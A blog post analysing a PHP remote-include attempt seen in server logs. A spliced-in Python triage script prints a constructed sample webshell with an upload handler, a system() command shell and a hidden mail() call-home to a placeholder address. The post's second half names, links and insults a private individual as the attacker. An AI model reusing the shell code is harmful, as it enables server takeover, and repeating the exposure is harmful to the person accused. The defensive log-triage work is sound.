My webserver got a strange-looking request earlier. In fact, it got two identical ones within 10 minutes of each other. One came from America, one came from Moldova, but upon further inspection, both are running web servers, and the user agent in both is ‘libwww-perl/5.805’, so they likely fell prey to the same attack and are now being used to propagate it to other sites. Turns out it was trying to perform a remote include exploit, so naturally, I had a look at exactly what it was trying to include. It tries to pull in a PHP script which implements a file upload and shell interface (via system()), which, if successful, would give an attacker a fair amount of control over the server. Upon successfully including itself, it would email somebody a little message with the server details. The author was a little sensitive about this and he hid that code behind a base64 string and eval()ed it. The email address was hidden inside that as yet another base64 string (as if I’m going to decode the first one then suddenly forget how to do it?), and it was:
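For anyone who wants to do the same triage on their own logs, here is an added example (mine, not code from the original post or from the script that was being included). It does two things the paragraph above describes by hand: it picks out requests whose query string carries a full URL as a parameter value (the shape of a PHP remote-include attempt) along with the client IP and user agent, and it statically peels an eval(base64_decode('...')) wrapper off a PHP payload and decodes any base64 string literals left inside it, so the notification address falls out without ever executing the script. The log lines, IP addresses, file names, the placeholder address attacker@example.invalid and the whole sample payload are constructed for the example and are not the real ones from the incident.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format: client, identd, user, [time], "request", status,
# size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (placeholder addresses, not the real requests).
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Jan/2009:10:02:31 +0000] "GET /index.php?page=http://198.51.100.7/x.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.2 - - [14/Jan/2009:10:05:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "http://example.invalid/" "Mozilla/5.0"',
]


def find_rfi_requests(log_lines):
    """Flag requests whose query string carries a URL as a parameter value.

    A vulnerable script doing include($_GET['page']) will fetch that URL; the
    trailing '?' attackers add turns whatever the script appends into a query
    string on their own server, so the include still resolves to their file.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if value.lower().startswith(("http://", "https://", "ftp://")):
                    hits.append({"ip": m.group("ip"), "ua": m.group("ua"),
                                 "param": name, "url": value})
    return hits


# eval(base64_decode('...')) wrapper, a bare base64_decode('...') literal,
# and the calls worth knowing about in a dropped PHP file.
EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)\s*\)""")
B64_LITERAL_RE = re.compile(
    r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
SUSPICIOUS_CALLS_RE = re.compile(
    r"\b(eval|system|exec|passthru|shell_exec|popen|mail|move_uploaded_file)\s*\(")


def peel_eval_layers(php_src, max_depth=16):
    """Return [outer, layer1, layer2, ...], decoding one eval(base64_decode()) per step."""
    layers = [php_src]
    for _ in range(max_depth):
        m = EVAL_B64_RE.search(layers[-1])
        if not m:
            break
        layers.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
    return layers


def decode_string_literals(php_src):
    """Decode base64_decode('...') literals used as data (e.g. a hidden address)."""
    return [base64.b64decode(s).decode("utf-8", "replace")
            for s in B64_LITERAL_RE.findall(php_src)]


def triage(php_src):
    """Static summary: nesting depth, notable calls across all layers, hidden strings."""
    layers = peel_eval_layers(php_src)
    calls = set()
    for layer in layers:
        calls.update(SUSPICIOUS_CALLS_RE.findall(layer))
    return {"depth": len(layers) - 1,
            "calls": sorted(calls),
            "strings": decode_string_literals(layers[-1])}


def build_sample():
    """Constructed payload in the shape the post describes: upload + shell in the
    clear, a mail() notification behind eval(base64_decode()), and the recipient
    hidden as a second base64 string inside that layer. Placeholder address."""
    notify = ("$to = base64_decode('%s');\n"
              "mail($to, 'new shell', $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']);\n"
              % base64.b64encode(b"attacker@example.invalid").decode())
    return ("<?php\n"
            "if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']); }\n"
            "if (isset($_POST['cmd'])) { echo system($_POST['cmd']); }\n"
            "eval(base64_decode('%s'));\n"
            % base64.b64encode(notify.encode()).decode())


if __name__ == "__main__":
    for hit in find_rfi_requests(SAMPLE_LOG):
        print("RFI attempt from %(ip)s (%(ua)s): %(param)s=%(url)s" % hit)
    print(triage(build_sample()))
```

Fetch the included file with a plain HTTP client and save it as text; never let your own PHP interpreter touch it. The decode is purely textual, so the mail() recipient and the system() shell show up in the report whether or not the payload would actually run on your box.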
If you Google it, it belongs to an Indonesian called Bambang Ariyanto, or BaMbY. Bamby’s not really the kind of smooth operator you’d expect such a leet haxor to be. You’d expect him to be using a throwaway email address and he’d connect to it a couple of times a week through Tor or something. If he’s sensitive enough to double-base64 encode identity information, you’d think he’d be keeping a low profile. Not so. Instead, he’s using what appears to be his personal email that he has registered elsewhere. He’s got social networking profiles and photos all over the place. About 10 minutes after I saw my server logs, I’d found his full name, location and several photos of him. In fact, you could say he’s a bit of an eejit.
I know what you’re thinking: maybe he just had his email hacked, and it’s not really him? It seems pretty unlikely. On his http://buahkata.blogspot.com/ blog, he has talked about free software and ReactOS [if you use Chrome it’ll translate it for you]. On his http://b4mby.multiply.com/ Multiply he has a link to http://www.securityfocus.com/, a site listing recent security vulnerabilities in software. We also have a posting here by someone called BaBmY, linking to a geocities (Yahoo) account called ‘bamby002a’ (check the email address), in which he’s sharing an extraordinarily inefficient MD5 brute forcer written in Perl, even though you could put together a much faster implementation in C in fewer lines.
Here’s his website: http://www.bamby.web.id/
There’s nothing there, but feel free to click it so he sees this in the referrer.
Bamby Ariyanto: you sir, are an idiot.